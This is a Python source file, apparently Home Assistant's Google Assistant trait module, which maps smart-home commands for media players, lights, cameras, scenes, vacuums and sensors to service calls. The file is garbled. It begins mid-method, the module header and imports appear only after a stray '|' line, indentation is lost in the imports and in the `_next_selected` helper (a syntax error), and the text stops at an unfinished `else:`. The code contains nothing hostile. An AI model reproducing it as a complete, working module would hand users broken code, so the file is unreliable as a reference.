            features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)

            support = []
            for command, feature in MEDIA_COMMAND_SUPPORT_MAPPING.items():
                if features & feature:
                    support.append(MEDIA_COMMAND_ATTRIBUTES[command])
            response["transportControlSupportedCommands"] = support

        return response

    def query_attributes(self):
        """Return the attributes of this trait for this entity."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a media command."""
        service_attrs = {ATTR_ENTITY_ID: self.state.entity_id}

        if command == COMMAND_MEDIA_SEEK_RELATIVE:
            service = media_player.SERVICE_MEDIA_SEEK

            rel_position = params["relativePositionMs"] / 1000
            seconds_since = 0  # Default to 0 seconds
            if self.state.state == STATE_PLAYING:
                # While playing, ATTR_MEDIA_POSITION is a snapshot; add the
                # wall-clock time elapsed since it was last updated.
                now = dt.utcnow()
                upd_at = self.state.attributes.get(
                    media_player.ATTR_MEDIA_POSITION_UPDATED_AT, now
                )
                seconds_since = (now - upd_at).total_seconds()
            position = self.state.attributes.get(media_player.ATTR_MEDIA_POSITION, 0)
            max_position = self.state.attributes.get(
                media_player.ATTR_MEDIA_DURATION, 0
            )
            # Clamp the target position to [0, duration].
            service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
                max(position + seconds_since + rel_position, 0), max_position
            )
        elif command == COMMAND_MEDIA_SEEK_TO_POSITION:
            service = media_player.SERVICE_MEDIA_SEEK

            max_position = self.state.attributes.get(
                media_player.ATTR_MEDIA_DURATION, 0
            )
            # Clamp the absolute target to [0, duration].
            service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
                max(params["absPositionMs"] / 1000, 0), max_position
            )
        elif command == COMMAND_MEDIA_NEXT:
            service = media_player.SERVICE_MEDIA_NEXT_TRACK
        elif command == COMMAND_MEDIA_PAUSE:
            service = media_player.SERVICE_MEDIA_PAUSE
        elif command == COMMAND_MEDIA_PREVIOUS:
            service = media_player.SERVICE_MEDIA_PREVIOUS_TRACK
        elif command == COMMAND_MEDIA_RESUME:
            service = media_player.SERVICE_MEDIA_PLAY
        elif command == COMMAND_MEDIA_SHUFFLE:
            service = media_player.SERVICE_SHUFFLE_SET

            # Google Assistant only supports enabling shuffle
            service_attrs[media_player.ATTR_MEDIA_SHUFFLE] = True
        elif command == COMMAND_MEDIA_STOP:
            service = media_player.SERVICE_MEDIA_STOP
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")

        await self.hass.services.async_call(
            media_player.DOMAIN,
            service,
            service_attrs,
            blocking=True,
            context=data.context,
        )
@register_trait
class MediaStateTrait(_Trait):
    """Trait to get media playback state.

    https://developers.google.com/actions/smarthome/traits/mediastate
    """

    name = TRAIT_MEDIA_STATE
    commands = []

    # Google activityState reported for each Home Assistant player state.
    activity_lookup = {
        STATE_OFF: "INACTIVE",
        STATE_IDLE: "STANDBY",
        STATE_PLAYING: "ACTIVE",
        STATE_ON: "STANDBY",
        STATE_PAUSED: "STANDBY",
        STATE_STANDBY: "STANDBY",
        STATE_UNAVAILABLE: "INACTIVE",
        STATE_UNKNOWN: "INACTIVE",
    }

    # Google playbackState reported for each Home Assistant player state.
    playback_lookup = {
        STATE_OFF: "STOPPED",
        STATE_IDLE: "STOPPED",
        STATE_PLAYING: "PLAYING",
        STATE_ON: "STOPPED",
        STATE_PAUSED: "PAUSED",
        STATE_STANDBY: "STOPPED",
        STATE_UNAVAILABLE: "STOPPED",
        STATE_UNKNOWN: "STOPPED",
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == media_player.DOMAIN

    def sync_attributes(self):
        """Return attributes for a sync request."""
        return {"supportActivityState": True, "supportPlaybackState": True}

    def query_attributes(self):
        """Return the attributes of this trait for this entity."""
        current = self.state.state
        return {
            "activityState": self.activity_lookup.get(current, "INACTIVE"),
            "playbackState": self.playback_lookup.get(current, "STOPPED"),
        }
@register_trait
class ChannelTrait(_Trait):
    """Trait to get media playback state.

    https://developers.google.com/actions/smarthome/traits/channel
    """

    name = TRAIT_CHANNEL
    commands = [COMMAND_SELECT_CHANNEL]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        # Only TVs that can play media support channel selection.
        return bool(
            domain == media_player.DOMAIN
            and features & media_player.SUPPORT_PLAY_MEDIA
            and device_class == media_player.DEVICE_CLASS_TV
        )

    def sync_attributes(self):
        """Return attributes for a sync request."""
        return {"availableChannels": [], "commandOnlyChannels": True}

    def query_attributes(self):
        """Return channel query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute an setChannel command."""
        if command != COMMAND_SELECT_CHANNEL:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")

        channel_number = params.get("channelNumber")
        if not channel_number:
            raise SmartHomeError(
                ERR_NO_AVAILABLE_CHANNEL,
                "Channel is not available",
            )

        # Channel changes are implemented as a play_media call with the
        # channel number as content id.
        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_CONTENT_ID: channel_number,
                media_player.ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class SensorStateTrait(_Trait):
    """Trait to get sensor state.

    https://developers.google.com/actions/smarthome/traits/sensorstate
    """

    # Maps a Home Assistant sensor device class to the Google sensor name
    # and the unit used for rawValue reporting.
    # Fix: CO (carbon monoxide) and CO2 (carbon dioxide) previously had
    # their Google sensor names swapped.
    sensor_types = {
        sensor.DEVICE_CLASS_AQI: ("AirQuality", "AQI"),
        sensor.DEVICE_CLASS_CO: ("CarbonMonoxideLevel", "PARTS_PER_MILLION"),
        sensor.DEVICE_CLASS_CO2: ("CarbonDioxideLevel", "PARTS_PER_MILLION"),
        sensor.DEVICE_CLASS_PM25: ("PM2.5", "MICROGRAMS_PER_CUBIC_METER"),
        sensor.DEVICE_CLASS_PM10: ("PM10", "MICROGRAMS_PER_CUBIC_METER"),
        sensor.DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS: (
            "VolatileOrganicCompounds",
            "PARTS_PER_MILLION",
        ),
    }

    name = TRAIT_SENSOR_STATE
    commands = []

    @classmethod
    def supported(cls, domain, features, device_class, _):
        """Test if state is supported."""
        return domain == sensor.DOMAIN and device_class in cls.sensor_types

    def sync_attributes(self):
        """Return attributes for a sync request.

        Returns None (implicitly) for an unmapped device class.
        """
        device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
        if (data := self.sensor_types.get(device_class)) is not None:
            return {
                "sensorStatesSupported": {
                    "name": data[0],
                    "numericCapabilities": {"rawValueUnit": data[1]},
                }
            }

    def query_attributes(self):
        """Return the attributes of this trait for this entity.

        Returns None (implicitly) for an unmapped device class.
        """
        device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
        if (data := self.sensor_types.get(device_class)) is not None:
            return {
                "currentSensorStateData": [
                    {"name": data[0], "rawValue": self.state.state}
                ]
            }
| """Implement the Google Smart Home traits."""
from __future__ import annotations
import logging
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
input_select,
light,
lock,
media_player,
scene,
script,
select,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.humidifier import const as humidifier
from homeassistant.components.lock import STATE_JAMMED, STATE_UNLOCKING
from homeassistant.components.media_player.const import MEDIA_TYPE_CHANNEL
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_BATTERY_LEVEL,
ATTR_CODE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_MODE,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
CAST_APP_ID_HOMEASSISTANT,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_DISARM,
SERVICE_ALARM_TRIGGER,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
STATE_IDLE,
STATE_LOCKED,
STATE_OFF,
STATE_ON,
STATE_PAUSED,
STATE_PLAYING,
STATE_STANDBY,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN
from homeassistant.helpers.network import get_url
from homeassistant.util import color as color_util, dt, temperature as temp_util
from .const import (
CHALLENGE_ACK_NEEDED,
CHALLENGE_FAILED_PIN_NEEDED,
CHALLENGE_PIN_NEEDED,
ERR_ALREADY_ARMED,
ERR_ALREADY_DISARMED,
ERR_ALREADY_STOPPED,
ERR_CHALLENGE_NOT_SETUP,
ERR_FUNCTION_NOT_SUPPORTED,
ERR_NO_AVAILABLE_CHANNEL,
ERR_NOT_SUPPORTED,
ERR_UNSUPPORTED_INPUT,
ERR_VALUE_OUT_OF_RANGE,
)
from .error import ChallengeNeeded, SmartHomeError
# Module-level logger for this integration module.
_LOGGER = logging.getLogger(__name__)
# Fully-qualified Google Smart Home trait identifiers.
# See https://developers.google.com/assistant/smarthome/traits
PREFIX_TRAITS = "action.devices.traits."
TRAIT_CAMERA_STREAM = f"{PREFIX_TRAITS}CameraStream"
TRAIT_ONOFF = f"{PREFIX_TRAITS}OnOff"
TRAIT_DOCK = f"{PREFIX_TRAITS}Dock"
TRAIT_STARTSTOP = f"{PREFIX_TRAITS}StartStop"
TRAIT_BRIGHTNESS = f"{PREFIX_TRAITS}Brightness"
TRAIT_COLOR_SETTING = f"{PREFIX_TRAITS}ColorSetting"
TRAIT_SCENE = f"{PREFIX_TRAITS}Scene"
TRAIT_TEMPERATURE_SETTING = f"{PREFIX_TRAITS}TemperatureSetting"
TRAIT_TEMPERATURE_CONTROL = f"{PREFIX_TRAITS}TemperatureControl"
TRAIT_LOCKUNLOCK = f"{PREFIX_TRAITS}LockUnlock"
TRAIT_FANSPEED = f"{PREFIX_TRAITS}FanSpeed"
TRAIT_MODES = f"{PREFIX_TRAITS}Modes"
TRAIT_INPUTSELECTOR = f"{PREFIX_TRAITS}InputSelector"
TRAIT_OPENCLOSE = f"{PREFIX_TRAITS}OpenClose"
TRAIT_VOLUME = f"{PREFIX_TRAITS}Volume"
TRAIT_ARMDISARM = f"{PREFIX_TRAITS}ArmDisarm"
TRAIT_HUMIDITY_SETTING = f"{PREFIX_TRAITS}HumiditySetting"
TRAIT_TRANSPORT_CONTROL = f"{PREFIX_TRAITS}TransportControl"
TRAIT_MEDIA_STATE = f"{PREFIX_TRAITS}MediaState"
TRAIT_CHANNEL = f"{PREFIX_TRAITS}Channel"
TRAIT_LOCATOR = f"{PREFIX_TRAITS}Locator"
TRAIT_ENERGYSTORAGE = f"{PREFIX_TRAITS}EnergyStorage"
TRAIT_SENSOR_STATE = f"{PREFIX_TRAITS}SensorState"
# Fully-qualified Google Smart Home command identifiers.  Note that Google
# mixes PascalCase and camelCase command names; these strings are part of
# the wire protocol and must not be normalized.
PREFIX_COMMANDS = "action.devices.commands."
COMMAND_ONOFF = f"{PREFIX_COMMANDS}OnOff"
COMMAND_GET_CAMERA_STREAM = f"{PREFIX_COMMANDS}GetCameraStream"
COMMAND_DOCK = f"{PREFIX_COMMANDS}Dock"
COMMAND_STARTSTOP = f"{PREFIX_COMMANDS}StartStop"
COMMAND_PAUSEUNPAUSE = f"{PREFIX_COMMANDS}PauseUnpause"
COMMAND_BRIGHTNESS_ABSOLUTE = f"{PREFIX_COMMANDS}BrightnessAbsolute"
COMMAND_COLOR_ABSOLUTE = f"{PREFIX_COMMANDS}ColorAbsolute"
COMMAND_ACTIVATE_SCENE = f"{PREFIX_COMMANDS}ActivateScene"
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT = (
    f"{PREFIX_COMMANDS}ThermostatTemperatureSetpoint"
)
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE = (
    f"{PREFIX_COMMANDS}ThermostatTemperatureSetRange"
)
COMMAND_THERMOSTAT_SET_MODE = f"{PREFIX_COMMANDS}ThermostatSetMode"
COMMAND_LOCKUNLOCK = f"{PREFIX_COMMANDS}LockUnlock"
COMMAND_FANSPEED = f"{PREFIX_COMMANDS}SetFanSpeed"
COMMAND_FANSPEEDRELATIVE = f"{PREFIX_COMMANDS}SetFanSpeedRelative"
COMMAND_MODES = f"{PREFIX_COMMANDS}SetModes"
COMMAND_INPUT = f"{PREFIX_COMMANDS}SetInput"
COMMAND_NEXT_INPUT = f"{PREFIX_COMMANDS}NextInput"
COMMAND_PREVIOUS_INPUT = f"{PREFIX_COMMANDS}PreviousInput"
COMMAND_OPENCLOSE = f"{PREFIX_COMMANDS}OpenClose"
COMMAND_OPENCLOSE_RELATIVE = f"{PREFIX_COMMANDS}OpenCloseRelative"
COMMAND_SET_VOLUME = f"{PREFIX_COMMANDS}setVolume"
COMMAND_VOLUME_RELATIVE = f"{PREFIX_COMMANDS}volumeRelative"
COMMAND_MUTE = f"{PREFIX_COMMANDS}mute"
COMMAND_ARMDISARM = f"{PREFIX_COMMANDS}ArmDisarm"
COMMAND_MEDIA_NEXT = f"{PREFIX_COMMANDS}mediaNext"
COMMAND_MEDIA_PAUSE = f"{PREFIX_COMMANDS}mediaPause"
COMMAND_MEDIA_PREVIOUS = f"{PREFIX_COMMANDS}mediaPrevious"
COMMAND_MEDIA_RESUME = f"{PREFIX_COMMANDS}mediaResume"
COMMAND_MEDIA_SEEK_RELATIVE = f"{PREFIX_COMMANDS}mediaSeekRelative"
COMMAND_MEDIA_SEEK_TO_POSITION = f"{PREFIX_COMMANDS}mediaSeekToPosition"
COMMAND_MEDIA_SHUFFLE = f"{PREFIX_COMMANDS}mediaShuffle"
COMMAND_MEDIA_STOP = f"{PREFIX_COMMANDS}mediaStop"
COMMAND_REVERSE = f"{PREFIX_COMMANDS}Reverse"
COMMAND_SET_HUMIDITY = f"{PREFIX_COMMANDS}SetHumidity"
COMMAND_SELECT_CHANNEL = f"{PREFIX_COMMANDS}selectChannel"
COMMAND_LOCATE = f"{PREFIX_COMMANDS}Locate"
COMMAND_CHARGE = f"{PREFIX_COMMANDS}Charge"
# Registry of all trait classes; populated by the @register_trait decorator.
TRAITS = []
def register_trait(trait):
    """Decorate a function to register a trait."""
    # Record the class in the module-level TRAITS registry and return it
    # unchanged, so the decorator is transparent to the decorated class.
    TRAITS.append(trait)
    return trait
def _google_temp_unit(units):
    """Map a Home Assistant temperature unit onto Google's "F"/"C" code."""
    # Anything that is not Fahrenheit is reported to Google as Celsius.
    return "F" if units == TEMP_FAHRENHEIT else "C"
def _next_selected(items: list[str], selected: str | None) -> str | None:
"""Return the next item in a item list starting at given value.
If selected is missing in items, None is returned
"""
try:
index = items.index(selected)
except ValueError:
return None
next_item = 0 if index == len(items) - 1 else index + 1
return items[next_item]
class _Trait:
    """Represents a Trait inside Google Assistant skill."""
    # Google command identifiers this trait can handle; subclasses override.
    commands = []
    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        # Default: no two-factor challenge.  Security-sensitive traits
        # (locks, alarms) override this to return True.
        return False
    def __init__(self, hass, state, config):
        """Initialize a trait for a state."""
        # hass: the HomeAssistant instance used to call services.
        self.hass = hass
        # state: the entity state object this trait wraps.
        self.state = state
        # config: the Google Assistant integration configuration.
        self.config = config
    def sync_attributes(self):
        """Return attributes for a sync request."""
        # Subclasses must implement; describes device capabilities to Google.
        raise NotImplementedError
    def query_attributes(self):
        """Return the attributes of this trait for this entity."""
        # Subclasses must implement; reports current device state to Google.
        raise NotImplementedError
    def can_execute(self, command, params):
        """Test if command can be executed."""
        return command in self.commands
    async def execute(self, command, data, params, challenge):
        """Execute a trait command."""
        # Subclasses must implement; performs the requested service call(s).
        raise NotImplementedError
@register_trait
class BrightnessTrait(_Trait):
    """Trait controlling the brightness of a light.

    https://developers.google.com/actions/smarthome/traits/brightness
    """

    name = TRAIT_BRIGHTNESS
    commands = [COMMAND_BRIGHTNESS_ABSOLUTE]

    @staticmethod
    def supported(domain, features, device_class, attributes):
        """Test if state is supported."""
        if domain != light.DOMAIN:
            return False
        return light.brightness_supported(
            attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
        )

    def sync_attributes(self):
        """Return brightness attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return brightness query attributes."""
        response = {}
        if self.state.domain == light.DOMAIN:
            raw = self.state.attributes.get(light.ATTR_BRIGHTNESS)
            # Scale HA's 0-255 brightness to Google's 0-100 percentage.
            response["brightness"] = 0 if raw is None else int(100 * (raw / 255))
        return response

    async def execute(self, command, data, params, challenge):
        """Execute a brightness command."""
        if self.state.domain != light.DOMAIN:
            return
        await self.hass.services.async_call(
            light.DOMAIN,
            light.SERVICE_TURN_ON,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                light.ATTR_BRIGHTNESS_PCT: params["brightness"],
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class CameraStreamTrait(_Trait):
    """Trait exposing a camera's live stream.

    https://developers.google.com/actions/smarthome/traits/camerastream
    """

    name = TRAIT_CAMERA_STREAM
    commands = [COMMAND_GET_CAMERA_STREAM]

    # Filled in by execute(); served back from query_attributes afterwards.
    stream_info = None

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == camera.DOMAIN and features & camera.SUPPORT_STREAM

    def sync_attributes(self):
        """Return stream attributes for a sync request."""
        return {
            "cameraStreamSupportedProtocols": ["hls"],
            "cameraStreamNeedAuthToken": False,
            "cameraStreamNeedDrmEncryption": False,
        }

    def query_attributes(self):
        """Return camera stream attributes."""
        return self.stream_info or {}

    async def execute(self, command, data, params, challenge):
        """Execute a get camera stream command."""
        stream_path = await self.hass.components.camera.async_request_stream(
            self.state.entity_id, "hls"
        )
        # Google needs an absolute URL plus the Cast receiver app to play it.
        self.stream_info = {
            "cameraStreamAccessUrl": f"{get_url(self.hass)}{stream_path}",
            "cameraStreamReceiverAppId": CAST_APP_ID_HOMEASSISTANT,
        }
@register_trait
class OnOffTrait(_Trait):
    """Trait providing basic on/off control.

    https://developers.google.com/actions/smarthome/traits/onoff
    """

    name = TRAIT_ONOFF
    commands = [COMMAND_ONOFF]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain in {
            group.DOMAIN,
            input_boolean.DOMAIN,
            switch.DOMAIN,
            fan.DOMAIN,
            light.DOMAIN,
            media_player.DOMAIN,
            humidifier.DOMAIN,
        }

    def sync_attributes(self):
        """Return OnOff attributes for a sync request."""
        # Assumed-state entities cannot report state reliably, so tell
        # Google the trait is command-only.
        if self.state.attributes.get(ATTR_ASSUMED_STATE, False):
            return {"commandOnlyOnOff": True}
        return {}

    def query_attributes(self):
        """Return OnOff query attributes."""
        is_on = self.state.state not in (STATE_OFF, STATE_UNKNOWN)
        return {"on": is_on}

    async def execute(self, command, data, params, challenge):
        """Execute an OnOff command."""
        domain = self.state.domain
        # Group entities are switched through the core homeassistant domain.
        service_domain = HA_DOMAIN if domain == group.DOMAIN else domain
        service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
        await self.hass.services.async_call(
            service_domain,
            service,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class ColorSettingTrait(_Trait):
    """Trait to offer color temperature functionality.
    https://developers.google.com/actions/smarthome/traits/colortemperature
    """
    name = TRAIT_COLOR_SETTING
    commands = [COMMAND_COLOR_ABSOLUTE]
    @staticmethod
    def supported(domain, features, device_class, attributes):
        """Test if state is supported."""
        # Only lights that support color and/or color temperature qualify.
        if domain != light.DOMAIN:
            return False
        color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
        return light.color_temp_supported(color_modes) or light.color_supported(
            color_modes
        )
    def sync_attributes(self):
        """Return color temperature attributes for a sync request."""
        attrs = self.state.attributes
        color_modes = attrs.get(light.ATTR_SUPPORTED_COLOR_MODES)
        response = {}
        if light.color_supported(color_modes):
            response["colorModel"] = "hsv"
        if light.color_temp_supported(color_modes):
            # Max Kelvin is Min Mireds K = 1000000 / mireds
            # Min Kelvin is Max Mireds K = 1000000 / mireds
            # Note the min/max inversion: mireds and Kelvin are reciprocal.
            response["colorTemperatureRange"] = {
                "temperatureMaxK": color_util.color_temperature_mired_to_kelvin(
                    attrs.get(light.ATTR_MIN_MIREDS)
                ),
                "temperatureMinK": color_util.color_temperature_mired_to_kelvin(
                    attrs.get(light.ATTR_MAX_MIREDS)
                ),
            }
        return response
    def query_attributes(self):
        """Return color temperature query attributes."""
        # Report based on the light's *current* color mode, not its full
        # capability set, so only the active representation is sent.
        color_mode = self.state.attributes.get(light.ATTR_COLOR_MODE)
        color = {}
        if light.color_supported([color_mode]):
            color_hs = self.state.attributes.get(light.ATTR_HS_COLOR)
            brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS, 1)
            if color_hs is not None:
                # Google expects saturation/value scaled to 0..1.
                color["spectrumHsv"] = {
                    "hue": color_hs[0],
                    "saturation": color_hs[1] / 100,
                    "value": brightness / 255,
                }
        if light.color_temp_supported([color_mode]):
            temp = self.state.attributes.get(light.ATTR_COLOR_TEMP)
            # Some faulty integrations might put 0 in here, raising exception.
            if temp == 0:
                _LOGGER.warning(
                    "Entity %s has incorrect color temperature %s",
                    self.state.entity_id,
                    temp,
                )
            elif temp is not None:
                color["temperatureK"] = color_util.color_temperature_mired_to_kelvin(
                    temp
                )
        response = {}
        if color:
            response["color"] = color
        return response
    async def execute(self, command, data, params, challenge):
        """Execute a color temperature command."""
        # Google sends exactly one of three color representations:
        # temperature (Kelvin), spectrumRGB (packed int) or spectrumHSV.
        if "temperature" in params["color"]:
            temp = color_util.color_temperature_kelvin_to_mired(
                params["color"]["temperature"]
            )
            min_temp = self.state.attributes[light.ATTR_MIN_MIREDS]
            max_temp = self.state.attributes[light.ATTR_MAX_MIREDS]
            if temp < min_temp or temp > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    f"Temperature should be between {min_temp} and {max_temp}",
                )
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_COLOR_TEMP: temp},
                blocking=True,
                context=data.context,
            )
        elif "spectrumRGB" in params["color"]:
            # Convert integer to hex format and left pad with 0's till length 6
            hex_value = f"{params['color']['spectrumRGB']:06x}"
            color = color_util.color_RGB_to_hs(
                *color_util.rgb_hex_to_rgb_list(hex_value)
            )
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_HS_COLOR: color},
                blocking=True,
                context=data.context,
            )
        elif "spectrumHSV" in params["color"]:
            color = params["color"]["spectrumHSV"]
            # Scale Google's 0..1 saturation/value back to HA's ranges.
            saturation = color["saturation"] * 100
            brightness = color["value"] * 255
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    light.ATTR_HS_COLOR: [color["hue"], saturation],
                    light.ATTR_BRIGHTNESS: brightness,
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class SceneTrait(_Trait):
    """Trait for activating scenes and scripts.

    https://developers.google.com/actions/smarthome/traits/scene
    """

    name = TRAIT_SCENE
    commands = [COMMAND_ACTIVATE_SCENE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain in (scene.DOMAIN, script.DOMAIN)

    def sync_attributes(self):
        """Return scene attributes for a sync request."""
        # Neither supported domain can support sceneReversible.
        return {}

    def query_attributes(self):
        """Return scene query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a scene command."""
        # Scripts may run for a long time, so only block for scenes.
        should_block = self.state.domain != script.DOMAIN
        await self.hass.services.async_call(
            self.state.domain,
            SERVICE_TURN_ON,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=should_block,
            context=data.context,
        )
@register_trait
class DockTrait(_Trait):
    """Trait sending a vacuum back to its dock.

    https://developers.google.com/actions/smarthome/traits/dock
    """

    name = TRAIT_DOCK
    commands = [COMMAND_DOCK]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN

    def sync_attributes(self):
        """Return dock attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return dock query attributes."""
        docked = self.state.state == vacuum.STATE_DOCKED
        return {"isDocked": docked}

    async def execute(self, command, data, params, challenge):
        """Execute a dock command."""
        await self.hass.services.async_call(
            self.state.domain,
            vacuum.SERVICE_RETURN_TO_BASE,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class LocatorTrait(_Trait):
    """Trait for locating a vacuum.

    https://developers.google.com/actions/smarthome/traits/locator
    """

    name = TRAIT_LOCATOR
    commands = [COMMAND_LOCATE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_LOCATE

    def sync_attributes(self):
        """Return locator attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return locator query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a locate command."""
        # Google can ask to silence an earlier locate request; HA has no
        # matching vacuum service, so reject it explicitly.
        if params.get("silence", False):
            raise SmartHomeError(
                ERR_FUNCTION_NOT_SUPPORTED,
                "Silencing a Locate request is not yet supported",
            )
        await self.hass.services.async_call(
            self.state.domain,
            vacuum.SERVICE_LOCATE,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class EnergyStorageTrait(_Trait):
    """Trait to offer EnergyStorage functionality.

    Reports a vacuum's battery level to Google as a query-only trait.
    https://developers.google.com/actions/smarthome/traits/energystorage
    """

    name = TRAIT_ENERGYSTORAGE
    commands = [COMMAND_CHARGE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_BATTERY

    def sync_attributes(self):
        """Return EnergyStorage attributes for a sync request."""
        return {
            "isRechargeable": True,
            "queryOnlyEnergyStorage": True,
        }

    def query_attributes(self):
        """Return EnergyStorage query attributes."""
        battery_level = self.state.attributes.get(ATTR_BATTERY_LEVEL)
        # The battery attribute may be absent (e.g. while the entity is
        # unavailable); comparing None with an int would raise TypeError.
        if battery_level is None:
            return {}
        # Map the percentage to Google's descriptive buckets.  The final
        # `else` also catches out-of-range values, which previously left
        # the variable unbound and raised UnboundLocalError.
        if battery_level >= 100:
            descriptive_capacity_remaining = "FULL"
        elif battery_level >= 75:
            descriptive_capacity_remaining = "HIGH"
        elif battery_level >= 50:
            descriptive_capacity_remaining = "MEDIUM"
        elif battery_level >= 25:
            descriptive_capacity_remaining = "LOW"
        else:
            descriptive_capacity_remaining = "CRITICALLY_LOW"
        return {
            "descriptiveCapacityRemaining": descriptive_capacity_remaining,
            "capacityRemaining": [{"rawValue": battery_level, "unit": "PERCENTAGE"}],
            "capacityUntilFull": [
                {"rawValue": 100 - battery_level, "unit": "PERCENTAGE"}
            ],
            # A docked vacuum is assumed to be plugged in and charging.
            "isCharging": self.state.state == vacuum.STATE_DOCKED,
            "isPluggedIn": self.state.state == vacuum.STATE_DOCKED,
        }

    async def execute(self, command, data, params, challenge):
        """Execute a dock command."""
        raise SmartHomeError(
            ERR_FUNCTION_NOT_SUPPORTED,
            "Controlling charging of a vacuum is not yet supported",
        )
@register_trait
class StartStopTrait(_Trait):
    """Trait to offer StartStop functionality.
    https://developers.google.com/actions/smarthome/traits/startstop
    """
    name = TRAIT_STARTSTOP
    commands = [COMMAND_STARTSTOP, COMMAND_PAUSEUNPAUSE]
    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        # All vacuums qualify; covers only if they can be stopped mid-travel.
        if domain == vacuum.DOMAIN:
            return True
        if domain == cover.DOMAIN and features & cover.SUPPORT_STOP:
            return True
        return False
    def sync_attributes(self):
        """Return StartStop attributes for a sync request."""
        domain = self.state.domain
        if domain == vacuum.DOMAIN:
            return {
                "pausable": self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
                & vacuum.SUPPORT_PAUSE
                != 0
            }
        if domain == cover.DOMAIN:
            return {}
        # Implicit None for other domains; unreachable because supported()
        # only admits vacuum and cover entities.
    def query_attributes(self):
        """Return StartStop query attributes."""
        domain = self.state.domain
        state = self.state.state
        if domain == vacuum.DOMAIN:
            return {
                "isRunning": state == vacuum.STATE_CLEANING,
                "isPaused": state == vacuum.STATE_PAUSED,
            }
        if domain == cover.DOMAIN:
            # A cover is "running" while it is actively moving.
            return {"isRunning": state in (cover.STATE_CLOSING, cover.STATE_OPENING)}
    async def execute(self, command, data, params, challenge):
        """Execute a StartStop command."""
        # Dispatch on domain; vacuums and covers have different semantics.
        domain = self.state.domain
        if domain == vacuum.DOMAIN:
            return await self._execute_vacuum(command, data, params, challenge)
        if domain == cover.DOMAIN:
            return await self._execute_cover(command, data, params, challenge)
    async def _execute_vacuum(self, command, data, params, challenge):
        """Execute a StartStop command."""
        if command == COMMAND_STARTSTOP:
            if params["start"]:
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_START,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
            else:
